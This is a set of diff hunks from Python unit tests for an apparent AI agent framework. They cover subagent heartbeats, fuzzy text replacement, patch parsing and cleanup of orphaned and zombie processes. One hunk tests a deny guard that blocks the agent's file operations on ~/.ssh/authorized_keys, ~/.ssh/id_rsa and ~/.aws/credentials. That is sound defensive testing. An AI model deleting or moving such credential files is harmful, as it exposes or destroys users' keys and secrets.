# Make run_conversation block long enough for heartbeats to fire
|
||||
def slow_run(**kwargs):
|
||||
time.sleep(0.25)
|
||||
return {"final_response": "done", "completed": True, "api_calls": 3}
|
||||
|
||||
child.run_conversation.side_effect = slow_run
|
||||
|
||||
# Patch the heartbeat interval to fire quickly
|
||||
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
|
||||
_run_single_child(
|
||||
task_index=0,
|
||||
goal="Test heartbeat",
|
||||
child=child,
|
||||
parent_agent=parent,
|
||||
)
|
||||
|
||||
# Heartbeat should have fired at least once during the 0.25s sleep
|
||||
self.assertGreater(len(touch_calls), 0,
|
||||
"Heartbeat did not propagate activity to parent")
|
||||
# Verify the description includes child's current tool detail
|
||||
self.assertTrue(
|
||||
any("terminal" in desc for desc in touch_calls),
|
||||
f"Heartbeat descriptions should include child tool info: {touch_calls}")
|
||||
|
||||
def test_heartbeat_stops_after_child_completes(self):
|
||||
"""Heartbeat thread is cleaned up when the child finishes."""
|
||||
from tools.delegate_tool import _run_single_child
|
||||
|
||||
parent = _make_mock_parent()
|
||||
touch_calls = []
|
||||
parent._touch_activity = lambda desc: touch_calls.append(desc)
|
||||
|
||||
child = MagicMock()
|
||||
child.get_activity_summary.return_value = {
|
||||
"current_tool": None,
|
||||
"api_call_count": 1,
|
||||
"max_iterations": 50,
|
||||
"last_activity_desc": "done",
|
||||
}
|
||||
child.run_conversation.return_value = {
|
||||
"final_response": "done", "completed": True, "api_calls": 1,
|
||||
}
|
||||
|
||||
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
|
||||
_run_single_child(
|
||||
task_index=0,
|
||||
goal="Test cleanup",
|
||||
child=child,
|
||||
parent_agent=parent,
|
||||
)
|
||||
|
||||
# Record count after completion, wait, and verify no more calls
|
||||
count_after = len(touch_calls)
|
||||
time.sleep(0.15)
|
||||
self.assertEqual(len(touch_calls), count_after,
|
||||
"Heartbeat continued firing after child completed")
|
||||
|
||||
def test_heartbeat_stops_after_child_error(self):
|
||||
"""Heartbeat thread is cleaned up even when the child raises."""
|
||||
from tools.delegate_tool import _run_single_child
|
||||
|
||||
parent = _make_mock_parent()
|
||||
touch_calls = []
|
||||
parent._touch_activity = lambda desc: touch_calls.append(desc)
|
||||
|
||||
child = MagicMock()
|
||||
child.get_activity_summary.return_value = {
|
||||
"current_tool": "web_search",
|
||||
"api_call_count": 2,
|
||||
"max_iterations": 50,
|
||||
"last_activity_desc": "executing tool: web_search",
|
||||
}
|
||||
|
||||
def slow_fail(**kwargs):
|
||||
time.sleep(0.15)
|
||||
raise RuntimeError("network timeout")
|
||||
|
||||
child.run_conversation.side_effect = slow_fail
|
||||
|
||||
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
|
||||
result = _run_single_child(
|
||||
task_index=0,
|
||||
goal="Test error cleanup",
|
||||
child=child,
|
||||
parent_agent=parent,
|
||||
)
|
||||
|
||||
self.assertEqual(result["status"], "error")
|
||||
|
||||
# Verify heartbeat stopped
|
||||
count_after = len(touch_calls)
|
||||
time.sleep(0.15)
|
||||
self.assertEqual(len(touch_calls), count_after,
|
||||
"Heartbeat continued firing after child error")
|
||||
|
||||
def test_heartbeat_includes_child_activity_desc_when_no_tool(self):
|
||||
"""When child has no current_tool, heartbeat uses last_activity_desc."""
|
||||
from tools.delegate_tool import _run_single_child
|
||||
|
||||
parent = _make_mock_parent()
|
||||
touch_calls = []
|
||||
parent._touch_activity = lambda desc: touch_calls.append(desc)
|
||||
|
||||
child = MagicMock()
|
||||
child.get_activity_summary.return_value = {
|
||||
"current_tool": None,
|
||||
"api_call_count": 5,
|
||||
"max_iterations": 90,
|
||||
"last_activity_desc": "API call #5 completed",
|
||||
}
|
||||
|
||||
def slow_run(**kwargs):
|
||||
time.sleep(0.15)
|
||||
return {"final_response": "done", "completed": True, "api_calls": 5}
|
||||
|
||||
child.run_conversation.side_effect = slow_run
|
||||
|
||||
with patch("tools.delegate_tool._HEARTBEAT_INTERVAL", 0.05):
|
||||
_run_single_child(
|
||||
task_index=0,
|
||||
goal="Test desc fallback",
|
||||
child=child,
|
||||
parent_agent=parent,
|
||||
)
|
||||
|
||||
self.assertGreater(len(touch_calls), 0)
|
||||
self.assertTrue(
|
||||
any("API call #5 completed" in desc for desc in touch_calls),
|
||||
f"Heartbeat should include last_activity_desc: {touch_calls}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
|
||||
@@ -333,3 +333,25 @@ class TestShellFileOpsWriteDenied:
|
||||
result = file_ops.patch_replace("~/.ssh/authorized_keys", "old", "new")
|
||||
assert result.error is not None
|
||||
assert "denied" in result.error.lower()
|
||||
|
||||
def test_delete_file_denied_path(self, file_ops):
|
||||
result = file_ops.delete_file("~/.ssh/authorized_keys")
|
||||
assert result.error is not None
|
||||
assert "denied" in result.error.lower()
|
||||
|
||||
def test_move_file_src_denied(self, file_ops):
|
||||
result = file_ops.move_file("~/.ssh/id_rsa", "/tmp/dest.txt")
|
||||
assert result.error is not None
|
||||
assert "denied" in result.error.lower()
|
||||
|
||||
def test_move_file_dst_denied(self, file_ops):
|
||||
result = file_ops.move_file("/tmp/src.txt", "~/.aws/credentials")
|
||||
assert result.error is not None
|
||||
assert "denied" in result.error.lower()
|
||||
|
||||
def test_move_file_failure_path(self, mock_env):
|
||||
mock_env.execute.return_value = {"output": "No such file or directory", "returncode": 1}
|
||||
ops = ShellFileOperations(mock_env)
|
||||
result = ops.move_file("/tmp/nonexistent.txt", "/tmp/dest.txt")
|
||||
assert result.error is not None
|
||||
assert "Failed to move" in result.error
|
||||
|
||||
@@ -6,31 +6,31 @@ from tools.fuzzy_match import fuzzy_find_and_replace
|
||||
class TestExactMatch:
|
||||
def test_single_replacement(self):
|
||||
content = "hello world"
|
||||
new, count, err = fuzzy_find_and_replace(content, "hello", "hi")
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "hello", "hi")
|
||||
assert err is None
|
||||
assert count == 1
|
||||
assert new == "hi world"
|
||||
|
||||
def test_no_match(self):
|
||||
content = "hello world"
|
||||
new, count, err = fuzzy_find_and_replace(content, "xyz", "abc")
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "xyz", "abc")
|
||||
assert count == 0
|
||||
assert err is not None
|
||||
assert new == content
|
||||
|
||||
def test_empty_old_string(self):
|
||||
new, count, err = fuzzy_find_and_replace("abc", "", "x")
|
||||
new, count, _, err = fuzzy_find_and_replace("abc", "", "x")
|
||||
assert count == 0
|
||||
assert err is not None
|
||||
|
||||
def test_identical_strings(self):
|
||||
new, count, err = fuzzy_find_and_replace("abc", "abc", "abc")
|
||||
new, count, _, err = fuzzy_find_and_replace("abc", "abc", "abc")
|
||||
assert count == 0
|
||||
assert "identical" in err
|
||||
|
||||
def test_multiline_exact(self):
|
||||
content = "line1\nline2\nline3"
|
||||
new, count, err = fuzzy_find_and_replace(content, "line1\nline2", "replaced")
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "line1\nline2", "replaced")
|
||||
assert err is None
|
||||
assert count == 1
|
||||
assert new == "replaced\nline3"
|
||||
@@ -39,7 +39,7 @@ class TestExactMatch:
|
||||
class TestWhitespaceDifference:
|
||||
def test_extra_spaces_match(self):
|
||||
content = "def foo( x, y ):"
|
||||
new, count, err = fuzzy_find_and_replace(content, "def foo( x, y ):", "def bar(x, y):")
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "def foo( x, y ):", "def bar(x, y):")
|
||||
assert count == 1
|
||||
assert "bar" in new
|
||||
|
||||
@@ -47,7 +47,7 @@ class TestWhitespaceDifference:
|
||||
class TestIndentDifference:
|
||||
def test_different_indentation(self):
|
||||
content = " def foo():\n pass"
|
||||
new, count, err = fuzzy_find_and_replace(content, "def foo():\n pass", "def bar():\n return 1")
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "def foo():\n pass", "def bar():\n return 1")
|
||||
assert count == 1
|
||||
assert "bar" in new
|
||||
|
||||
@@ -55,13 +55,96 @@ class TestIndentDifference:
|
||||
class TestReplaceAll:
|
||||
def test_multiple_matches_without_flag_errors(self):
|
||||
content = "aaa bbb aaa"
|
||||
new, count, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=False)
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=False)
|
||||
assert count == 0
|
||||
assert "Found 2 matches" in err
|
||||
|
||||
def test_multiple_matches_with_flag(self):
|
||||
content = "aaa bbb aaa"
|
||||
new, count, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=True)
|
||||
new, count, _, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=True)
|
||||
assert err is None
|
||||
assert count == 2
|
||||
assert new == "ccc bbb ccc"
|
||||
|
||||
|
||||
class TestUnicodeNormalized:
|
||||
"""Tests for the unicode_normalized strategy (Bug 5)."""
|
||||
|
||||
def test_em_dash_matched(self):
|
||||
"""Em-dash in content should match ASCII '--' in pattern."""
|
||||
content = "return value\u2014fallback"
|
||||
new, count, strategy, err = fuzzy_find_and_replace(
|
||||
content, "return value--fallback", "return value or fallback"
|
||||
)
|
||||
assert count == 1, f"Expected match via unicode_normalized, got err={err}"
|
||||
assert strategy == "unicode_normalized"
|
||||
assert "return value or fallback" in new
|
||||
|
||||
def test_smart_quotes_matched(self):
|
||||
"""Smart double quotes in content should match straight quotes in pattern."""
|
||||
content = 'print(\u201chello\u201d)'
|
||||
new, count, strategy, err = fuzzy_find_and_replace(
|
||||
content, 'print("hello")', 'print("world")'
|
||||
)
|
||||
assert count == 1, f"Expected match via unicode_normalized, got err={err}"
|
||||
assert "world" in new
|
||||
|
||||
def test_no_unicode_skips_strategy(self):
|
||||
"""When content and pattern have no Unicode variants, strategy is skipped."""
|
||||
content = "hello world"
|
||||
# Should match via exact, not unicode_normalized
|
||||
new, count, strategy, err = fuzzy_find_and_replace(content, "hello", "hi")
|
||||
assert count == 1
|
||||
assert strategy == "exact"
|
||||
|
||||
|
||||
class TestBlockAnchorThreshold:
|
||||
"""Tests for the raised block_anchor threshold (Bug 4)."""
|
||||
|
||||
def test_high_similarity_matches(self):
|
||||
"""A block with >50% middle similarity should match."""
|
||||
content = "def foo():\n x = 1\n y = 2\n return x + y\n"
|
||||
pattern = "def foo():\n x = 1\n y = 9\n return x + y"
|
||||
new, count, strategy, err = fuzzy_find_and_replace(content, pattern, "def foo():\n return 0\n")
|
||||
# Should match via block_anchor or earlier strategy
|
||||
assert count == 1
|
||||
|
||||
def test_completely_different_middle_does_not_match(self):
|
||||
"""A block where only first+last lines match but middle is completely different
|
||||
should NOT match under the raised 0.50 threshold."""
|
||||
content = (
|
||||
"class Foo:\n"
|
||||
" completely = 'unrelated'\n"
|
||||
" content = 'here'\n"
|
||||
" nothing = 'in common'\n"
|
||||
" pass\n"
|
||||
)
|
||||
# Pattern has same first/last lines but completely different middle
|
||||
pattern = (
|
||||
"class Foo:\n"
|
||||
" x = 1\n"
|
||||
" y = 2\n"
|
||||
" z = 3\n"
|
||||
" pass"
|
||||
)
|
||||
new, count, strategy, err = fuzzy_find_and_replace(content, pattern, "replaced")
|
||||
# With threshold=0.50, this near-zero-similarity middle should not match
|
||||
assert count == 0, (
|
||||
f"Block with unrelated middle should not match under threshold=0.50, "
|
||||
f"but matched via strategy={strategy}"
|
||||
)
|
||||
|
||||
|
||||
class TestStrategyNameSurfaced:
|
||||
"""Tests for the strategy name in the 4-tuple return (Bug 6)."""
|
||||
|
||||
def test_exact_strategy_name(self):
|
||||
new, count, strategy, err = fuzzy_find_and_replace("hello", "hello", "world")
|
||||
assert strategy == "exact"
|
||||
assert count == 1
|
||||
|
||||
def test_failed_match_returns_none_strategy(self):
|
||||
new, count, strategy, err = fuzzy_find_and_replace("hello", "xyz", "world")
|
||||
assert count == 0
|
||||
assert strategy is None
|
||||
assert err is not None
|
||||
|
||||
@@ -104,6 +104,45 @@ class TestStdioPidTracking:
|
||||
with _lock:
|
||||
assert fake_pid not in _stdio_pids
|
||||
|
||||
def test_kill_orphaned_uses_sigkill_when_available(self, monkeypatch):
|
||||
"""Unix-like platforms should keep using SIGKILL for orphan cleanup."""
|
||||
from tools.mcp_tool import _kill_orphaned_mcp_children, _stdio_pids, _lock
|
||||
|
||||
fake_pid = 424242
|
||||
with _lock:
|
||||
_stdio_pids.clear()
|
||||
_stdio_pids.add(fake_pid)
|
||||
|
||||
fake_sigkill = 9
|
||||
monkeypatch.setattr(signal, "SIGKILL", fake_sigkill, raising=False)
|
||||
|
||||
with patch("tools.mcp_tool.os.kill") as mock_kill:
|
||||
_kill_orphaned_mcp_children()
|
||||
|
||||
mock_kill.assert_called_once_with(fake_pid, fake_sigkill)
|
||||
|
||||
with _lock:
|
||||
assert fake_pid not in _stdio_pids
|
||||
|
||||
def test_kill_orphaned_falls_back_without_sigkill(self, monkeypatch):
|
||||
"""Windows-like signal modules without SIGKILL should fall back to SIGTERM."""
|
||||
from tools.mcp_tool import _kill_orphaned_mcp_children, _stdio_pids, _lock
|
||||
|
||||
fake_pid = 434343
|
||||
with _lock:
|
||||
_stdio_pids.clear()
|
||||
_stdio_pids.add(fake_pid)
|
||||
|
||||
monkeypatch.delattr(signal, "SIGKILL", raising=False)
|
||||
|
||||
with patch("tools.mcp_tool.os.kill") as mock_kill:
|
||||
_kill_orphaned_mcp_children()
|
||||
|
||||
mock_kill.assert_called_once_with(fake_pid, signal.SIGTERM)
|
||||
|
||||
with _lock:
|
||||
assert fake_pid not in _stdio_pids
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fix 3: MCP reload timeout (cli.py)
|
||||
|
||||
@@ -159,7 +159,7 @@ class TestApplyUpdate:
|
||||
def __init__(self):
|
||||
self.written = None
|
||||
|
||||
def read_file(self, path, offset=1, limit=500):
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(
|
||||
content=(
|
||||
'def run():\n'
|
||||
@@ -211,7 +211,7 @@ class TestAdditionOnlyHunks:
|
||||
# Apply to a file that contains the context hint
|
||||
class FakeFileOps:
|
||||
written = None
|
||||
def read_file(self, path, **kw):
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(
|
||||
content="def main():\n pass\n",
|
||||
error=None,
|
||||
@@ -239,7 +239,7 @@ class TestAdditionOnlyHunks:
|
||||
|
||||
class FakeFileOps:
|
||||
written = None
|
||||
def read_file(self, path, **kw):
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(
|
||||
content="existing = True\n",
|
||||
error=None,
|
||||
@@ -253,3 +253,259 @@ class TestAdditionOnlyHunks:
|
||||
assert result.success is True
|
||||
assert file_ops.written.endswith("def new_func():\n return True\n")
|
||||
assert "existing = True" in file_ops.written
|
||||
|
||||
|
||||
class TestReadFileRaw:
|
||||
"""Bug 1 regression tests — files > 2000 lines and lines > 2000 chars."""
|
||||
|
||||
def test_apply_update_file_over_2000_lines(self):
|
||||
"""A hunk targeting line 2200 must not truncate the file to 2000 lines."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: big.py
|
||||
@@ marker_at_2200 @@
|
||||
line_2200
|
||||
-old_value
|
||||
+new_value
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
# Build a 2500-line file; the hunk targets a region at line 2200
|
||||
lines = [f"line_{i}" for i in range(1, 2501)]
|
||||
lines[2199] = "line_2200" # index 2199 = line 2200
|
||||
lines[2200] = "old_value"
|
||||
file_content = "\n".join(lines)
|
||||
|
||||
class FakeFileOps:
|
||||
written = None
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(content=file_content, error=None)
|
||||
def write_file(self, path, content):
|
||||
self.written = content
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
file_ops = FakeFileOps()
|
||||
result = apply_v4a_operations(ops, file_ops)
|
||||
assert result.success is True
|
||||
written_lines = file_ops.written.split("\n")
|
||||
assert len(written_lines) == 2500, (
|
||||
f"Expected 2500 lines, got {len(written_lines)}"
|
||||
)
|
||||
assert "new_value" in file_ops.written
|
||||
assert "old_value" not in file_ops.written
|
||||
|
||||
def test_apply_update_preserves_long_lines(self):
|
||||
"""A line > 2000 chars must be preserved verbatim after an unrelated hunk."""
|
||||
long_line = "x" * 3000
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: wide.py
|
||||
@@ short_func @@
|
||||
def short_func():
|
||||
- return 1
|
||||
+ return 2
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
file_content = f"def short_func():\n return 1\n{long_line}\n"
|
||||
|
||||
class FakeFileOps:
|
||||
written = None
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(content=file_content, error=None)
|
||||
def write_file(self, path, content):
|
||||
self.written = content
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
file_ops = FakeFileOps()
|
||||
result = apply_v4a_operations(ops, file_ops)
|
||||
assert result.success is True
|
||||
assert long_line in file_ops.written, "Long line was truncated"
|
||||
assert "... [truncated]" not in file_ops.written
|
||||
|
||||
|
||||
class TestValidationPhase:
|
||||
"""Bug 2 regression tests — validation prevents partial apply."""
|
||||
|
||||
def test_validation_failure_writes_nothing(self):
|
||||
"""If one hunk is invalid, no files should be written."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: a.py
|
||||
def good():
|
||||
- return 1
|
||||
+ return 2
|
||||
*** Update File: b.py
|
||||
THIS LINE DOES NOT EXIST
|
||||
- old
|
||||
+ new
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
written = {}
|
||||
|
||||
class FakeFileOps:
|
||||
def read_file_raw(self, path):
|
||||
files = {
|
||||
"a.py": "def good():\n return 1\n",
|
||||
"b.py": "completely different content\n",
|
||||
}
|
||||
content = files.get(path)
|
||||
if content is None:
|
||||
return SimpleNamespace(content=None, error=f"File not found: {path}")
|
||||
return SimpleNamespace(content=content, error=None)
|
||||
|
||||
def write_file(self, path, content):
|
||||
written[path] = content
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
result = apply_v4a_operations(ops, FakeFileOps())
|
||||
assert result.success is False
|
||||
assert written == {}, f"No files should have been written, got: {list(written.keys())}"
|
||||
assert "validation failed" in result.error.lower()
|
||||
|
||||
def test_all_valid_operations_applied(self):
|
||||
"""When all operations are valid, all files are written."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: a.py
|
||||
def foo():
|
||||
- return 1
|
||||
+ return 2
|
||||
*** Update File: b.py
|
||||
def bar():
|
||||
- pass
|
||||
+ return True
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
written = {}
|
||||
|
||||
class FakeFileOps:
|
||||
def read_file_raw(self, path):
|
||||
files = {
|
||||
"a.py": "def foo():\n return 1\n",
|
||||
"b.py": "def bar():\n pass\n",
|
||||
}
|
||||
return SimpleNamespace(content=files[path], error=None)
|
||||
|
||||
def write_file(self, path, content):
|
||||
written[path] = content
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
result = apply_v4a_operations(ops, FakeFileOps())
|
||||
assert result.success is True
|
||||
assert set(written.keys()) == {"a.py", "b.py"}
|
||||
|
||||
|
||||
class TestApplyDelete:
|
||||
"""Tests for _apply_delete producing a real unified diff."""
|
||||
|
||||
def test_delete_diff_contains_removed_lines(self):
|
||||
"""_apply_delete must embed the actual file content in the diff, not a placeholder."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Delete File: old/stuff.py
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
class FakeFileOps:
|
||||
deleted = False
|
||||
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(
|
||||
content="def old_func():\n return 42\n",
|
||||
error=None,
|
||||
)
|
||||
|
||||
def delete_file(self, path):
|
||||
self.deleted = True
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
file_ops = FakeFileOps()
|
||||
result = apply_v4a_operations(ops, file_ops)
|
||||
|
||||
assert result.success is True
|
||||
assert file_ops.deleted is True
|
||||
# Diff must contain the actual removed lines, not a bare comment
|
||||
assert "-def old_func():" in result.diff
|
||||
assert "- return 42" in result.diff
|
||||
assert "/dev/null" in result.diff
|
||||
|
||||
def test_delete_diff_fallback_on_empty_file(self):
|
||||
"""An empty file should produce the fallback comment diff."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Delete File: empty.py
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
|
||||
class FakeFileOps:
|
||||
def read_file_raw(self, path):
|
||||
return SimpleNamespace(content="", error=None)
|
||||
|
||||
def delete_file(self, path):
|
||||
return SimpleNamespace(error=None)
|
||||
|
||||
result = apply_v4a_operations(ops, FakeFileOps())
|
||||
assert result.success is True
|
||||
# unified_diff produces nothing for two empty inputs — fallback comment expected
|
||||
assert "Deleted" in result.diff or result.diff.strip() == ""
|
||||
|
||||
|
||||
class TestCountOccurrences:
|
||||
def test_basic(self):
|
||||
from tools.patch_parser import _count_occurrences
|
||||
assert _count_occurrences("aaa", "a") == 3
|
||||
assert _count_occurrences("aaa", "aa") == 2
|
||||
assert _count_occurrences("hello world", "xyz") == 0
|
||||
assert _count_occurrences("", "x") == 0
|
||||
|
||||
|
||||
class TestParseErrorSignalling:
|
||||
"""Bug 3 regression tests — parse_v4a_patch must signal errors, not swallow them."""
|
||||
|
||||
def test_update_with_no_hunks_returns_error(self):
|
||||
"""An UPDATE with no hunk lines is a malformed patch and should error."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: foo.py
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is not None, "Expected a parse error for hunk-less UPDATE"
|
||||
assert ops == []
|
||||
|
||||
def test_move_without_destination_returns_error(self):
|
||||
"""A MOVE without '->' syntax should not silently produce a broken operation."""
|
||||
# The move regex requires '->' so this will be treated as an unrecognised
|
||||
# line and the op is never created. Confirm nothing crashes and ops is empty.
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Move File: src/foo.py
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
# Either parse sees zero ops (fine) or returns an error (also fine).
|
||||
# What is NOT acceptable is ops=[MOVE op with empty new_path] + err=None.
|
||||
if ops:
|
||||
assert err is not None, (
|
||||
"MOVE with missing destination must either produce empty ops or an error"
|
||||
)
|
||||
|
||||
def test_valid_patch_returns_no_error(self):
|
||||
"""A well-formed patch must still return err=None."""
|
||||
patch = """\
|
||||
*** Begin Patch
|
||||
*** Update File: f.py
|
||||
ctx
|
||||
-old
|
||||
+new
|
||||
*** End Patch"""
|
||||
ops, err = parse_v4a_patch(patch)
|
||||
assert err is None
|
||||
assert len(ops) == 1
|
||||
|
||||
@@ -0,0 +1,274 @@
|
||||
"""Tests for zombie process cleanup — verifies processes spawned by tools
|
||||
are properly reaped when agent sessions end.
|
||||
|
||||
Reproduction for issue #7131: zombie process accumulation on long-running
|
||||
gateway deployments.
|
||||
"""
|
||||
|
||||
import os
|
||||
import signal
|
||||
import subprocess
|
||||
import sys
|
||||
import time
|
||||
import threading
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
def _spawn_sleep(seconds: float = 60) -> subprocess.Popen:
|
||||
"""Spawn a portable long-lived Python sleep process (no shell wrapper)."""
|
||||
return subprocess.Popen(
|
||||
[sys.executable, "-c", f"import time; time.sleep({seconds})"],
|
||||
)
|
||||
|
||||
|
||||
def _pid_alive(pid: int) -> bool:
|
||||
"""Return True if a process with the given PID is still running."""
|
||||
try:
|
||||
os.kill(pid, 0)
|
||||
return True
|
||||
except (ProcessLookupError, PermissionError):
|
||||
return False
|
||||
|
||||
|
||||
class TestZombieReproduction:
|
||||
"""Demonstrate that subprocesses survive when cleanup is not called."""
|
||||
|
||||
def test_orphaned_processes_survive_without_cleanup(self):
|
||||
"""REPRODUCTION: processes spawned directly survive if no one kills
|
||||
them — this models the gap that causes zombie accumulation when
|
||||
the gateway drops agent references without calling close()."""
|
||||
pids = []
|
||||
|
||||
try:
|
||||
for _ in range(3):
|
||||
proc = _spawn_sleep(60)
|
||||
pids.append(proc.pid)
|
||||
|
||||
for pid in pids:
|
||||
assert _pid_alive(pid), f"PID {pid} should be alive after spawn"
|
||||
|
||||
# Simulate "session end" by just dropping the reference
|
||||
del proc # noqa: F821
|
||||
|
||||
# BUG: processes are still alive after reference is dropped
|
||||
for pid in pids:
|
||||
assert _pid_alive(pid), (
|
||||
f"PID {pid} died after ref drop — "
|
||||
f"expected it to survive (demonstrating the bug)"
|
||||
)
|
||||
finally:
|
||||
for pid in pids:
|
||||
try:
|
||||
os.kill(pid, signal.SIGKILL)
|
||||
except (ProcessLookupError, PermissionError):
|
||||
pass
|
||||
|
||||
def test_explicit_terminate_reaps_processes(self):
|
||||
"""Explicitly terminating+waiting on Popen handles works.
|
||||
This models what ProcessRegistry.kill_process does internally."""
|
||||
procs = []
|
||||
|
||||
try:
|
||||
for _ in range(3):
|
||||
proc = _spawn_sleep(60)
|
||||
procs.append(proc)
|
||||
|
||||
for proc in procs:
|
||||
assert _pid_alive(proc.pid)
|
||||
|
||||
for proc in procs:
|
||||
proc.terminate()
|
||||
proc.wait(timeout=5)
|
||||
|
||||
for proc in procs:
|
||||
assert proc.returncode is not None, (
|
||||
f"PID {proc.pid} should have exited after terminate+wait"
|
||||
)
|
||||
finally:
|
||||
for proc in procs:
|
||||
try:
|
||||
proc.kill()
|
||||
proc.wait(timeout=1)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
|
||||
class TestAgentCloseMethod:
|
||||
"""Verify AIAgent.close() exists, is idempotent, and calls cleanup."""
|
||||
|
||||
def test_close_calls_cleanup_functions(self):
|
||||
"""close() should call kill_all, cleanup_vm, cleanup_browser."""
|
||||
from unittest.mock import patch
|
||||
|
||||
with patch("run_agent.AIAgent.__init__", return_value=None):
|
||||
from run_agent import AIAgent
|
||||
agent = AIAgent.__new__(AIAgent)
|
||||
agent.session_id = "test-close-cleanup"
|
||||
agent._active_children = []
|
||||
agent._active_children_lock = threading.Lock()
|
||||
agent.client = None
|
||||
|
||||
with patch("tools.process_registry.process_registry") as mock_registry, \
|
||||
patch("tools.terminal_tool.cleanup_vm") as mock_cleanup_vm, \
|
||||
patch("tools.browser_tool.cleanup_browser") as mock_cleanup_browser:
|
||||
agent.close()
|
||||
|
||||
mock_registry.kill_all.assert_called_once_with(
|
||||
task_id="test-close-cleanup"
|
||||
)
|
||||
mock_cleanup_vm.assert_called_once_with("test-close-cleanup")
|
||||
mock_cleanup_browser.assert_called_once_with("test-close-cleanup")
|
||||
|
||||
def test_close_is_idempotent(self):
|
||||
"""close() can be called multiple times without error."""
|
||||
from unittest.mock import patch
|
||||
|
||||
with patch("run_agent.AIAgent.__init__", return_value=None):
|
||||
from run_agent import AIAgent
|
||||
agent = AIAgent.__new__(AIAgent)
|
||||
agent.session_id = "test-close-idempotent"
|
||||
agent._active_children = []
|
||||
agent._active_children_lock = threading.Lock()
|
||||
agent.client = None
|
||||
|
||||
agent.close()
|
||||
agent.close()
|
||||
agent.close()
|
||||
|
||||
def test_close_propagates_to_children(self):
|
||||
"""close() should call close() on all active child agents."""
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
with patch("run_agent.AIAgent.__init__", return_value=None):
|
||||
from run_agent import AIAgent
|
||||
agent = AIAgent.__new__(AIAgent)
|
||||
agent.session_id = "test-close-children"
|
||||
agent._active_children_lock = threading.Lock()
|
||||
agent.client = None
|
||||
|
||||
child_1 = MagicMock()
|
||||
child_2 = MagicMock()
|
||||
agent._active_children = [child_1, child_2]
|
||||
|
||||
agent.close()
|
||||
|
||||
child_1.close.assert_called_once()
|
||||
child_2.close.assert_called_once()
|
||||
assert agent._active_children == []
|
||||
|
||||
def test_close_survives_partial_failures(self):
|
||||
"""close() continues cleanup even if one step fails."""
|
||||
from unittest.mock import patch
|
||||
|
||||
with patch("run_agent.AIAgent.__init__", return_value=None):
|
||||
from run_agent import AIAgent
|
||||
agent = AIAgent.__new__(AIAgent)
|
||||
agent.session_id = "test-close-partial"
|
||||
agent._active_children = []
|
||||
agent._active_children_lock = threading.Lock()
|
||||
agent.client = None
|
||||
|
||||
with patch(
|
||||
"tools.process_registry.process_registry"
|
||||
) as mock_reg, patch(
|
||||
"tools.terminal_tool.cleanup_vm"
|
||||
) as mock_vm, patch(
|
||||
"tools.browser_tool.cleanup_browser"
|
||||
) as mock_browser:
|
||||
mock_reg.kill_all.side_effect = RuntimeError("boom")
|
||||
|
||||
agent.close()
|
||||
|
||||
mock_vm.assert_called_once()
|
||||
mock_browser.assert_called_once()
|
||||
|
||||
|
||||
class TestGatewayCleanupWiring:
|
||||
"""Verify gateway lifecycle calls close() on agents."""
|
||||
|
||||
def test_gateway_stop_calls_close(self):
|
||||
"""gateway stop() should call close() on all running agents."""
|
||||
import asyncio
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
runner = MagicMock()
|
||||
runner._running = True
|
||||
runner._running_agents = {}
|
||||
runner.adapters = {}
|
||||
runner._background_tasks = set()
|
||||
runner._pending_messages = {}
|
||||
runner._pending_approvals = {}
|
||||
runner._shutdown_event = asyncio.Event()
|
||||
runner._exit_reason = None
|
||||
|
||||
mock_agent_1 = MagicMock()
|
||||
mock_agent_2 = MagicMock()
|
||||
runner._running_agents = {
|
||||
"session-1": mock_agent_1,
|
||||
"session-2": mock_agent_2,
|
||||
}
|
||||
|
||||
